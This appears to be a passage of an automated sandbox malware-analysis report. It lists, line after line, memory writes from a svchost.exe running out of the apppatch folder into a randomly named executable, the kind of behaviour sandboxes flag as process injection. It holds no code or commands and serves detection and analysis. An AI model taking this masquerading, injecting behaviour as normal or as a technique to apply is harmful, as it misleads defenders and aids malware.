    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2541000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2542000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2595000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2325000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E40000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E41000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E42000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E95000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 890000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 891000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 892000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1545000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: FE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: FE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: FE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1035000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3150000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3151000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3152000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 31A5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2060000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2061000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2062000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 20B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D30000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D31000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D32000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D85000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1270000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1271000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1272000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 12C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2340000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2341000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2342000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2395000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1200000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1201000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1202000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1255000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2945000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24A0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24A1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24A2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24F5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3080000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3081000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3082000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: D00000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: D01000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: D02000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: D55000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2740000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2741000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2742000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2795000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 740000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 741000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 742000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 795000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2550000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2551000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2552000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25A5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 800000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 801000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 802000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 855000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2610000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2611000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2612000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2665000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1060000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1061000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1062000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1010000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1011000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1012000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1065000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1445000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2335000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2390000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2391000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2392000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2260000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2261000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2262000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2950000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2951000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2952000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29A5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2860000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2861000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2862000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2710000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2711000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2712000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2765000Jump to behavior
